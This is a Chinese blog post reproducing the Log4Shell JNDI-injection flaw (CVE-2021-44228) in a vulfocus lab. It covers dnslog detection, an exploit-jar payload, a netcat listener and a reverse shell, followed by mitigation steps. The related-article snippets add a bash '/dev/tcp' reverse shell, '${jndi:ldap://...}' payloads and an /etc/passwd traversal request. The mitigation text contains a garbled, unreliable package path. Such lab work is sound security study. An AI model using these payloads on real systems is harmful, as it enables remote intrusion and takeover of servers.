vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-04-19 11:57:29 发布
最新推荐文章于 2024-04-19 11:57:29 发布
阅读量4.9k 收藏 4
点赞数
分类专栏: 安全 文章标签: apache 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/121960421
版权

根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证
在这里插入图片描述

创建靶场后是这样一个页面。
在这里插入图片描述

使用payload验证,发现可以触发dnslog,可以确认可以利用
在这里插入图片描述
证明存在JNDI注入漏洞。

在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,即反弹shell。

工具地址:
https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools

然后使用如下网址来加密反弹shell命令

加密网址:
https://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell方法:
https://www.freebuf.com/articles/system/178150.html

在这里插入图片描述

在服务器中监听端口:

nc -lvvp 9999

在这里插入图片描述

我这里绑定的是服务器的9999端口(别忘了在服务器安全配置和宝塔安全配置开启端口)

我们使用工具就获得了payload
在这里插入图片描述
然后我们在靶场输入我们的恶意payload

在这里插入图片描述
点击提交之后我们发现反弹shell成功
在这里插入图片描述

修复建议
1、将Log4j框架升级到2.15.0版本:

org/apache/loging/logj/logj-core/5.0

不要用2.15.0-rc1和2.15.0-rc2

2、临时方案

1、升级JDK

2、修改log4j配置

①设置参数:

log4j2.formatMsgNoLookups=True

②修改jvm参数:

-Dlog4j2.formatMsgNoLookups=true

③系统环境变量:

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

④禁止log4j2所在的服务器外连

3、使用安全产品防护:WAF、RASP

kb2414
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2漏洞原理分析及复现-CVE-2021-44228vulfocus靶场)
yang1234567898的博客
04-18 3184
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013
没有故事
04-19 535
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。
Vulfocus漏洞复现log4j2-cve-2021-44228
weixin_45632448的博客
04-13 3932
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400 payload=${jndi:ldap://7272sq.ceye.io} 对payload进行url编码(burp自带),再次进行请求,
Log4j2_RCE漏洞复现
Le1a's Blog
12-16 1984
log4j2_RCE漏洞复现 这里是用了两种工具来复现漏洞 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法 靶机地址:http://vulfocus.fofa.so/ 工具地址:https://www.lanzoup.com/i8Aa4xo5gmf 密码:Le1a 访问靶机地址 先把 工具上传到VPS上,然后运行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b
CVE-2021-44228Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7161
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
log4j-rce-payload
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class ...
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1255
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocuslog4j2靶场docker,使用Kali系统进行复现实验。
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 531
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1619
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值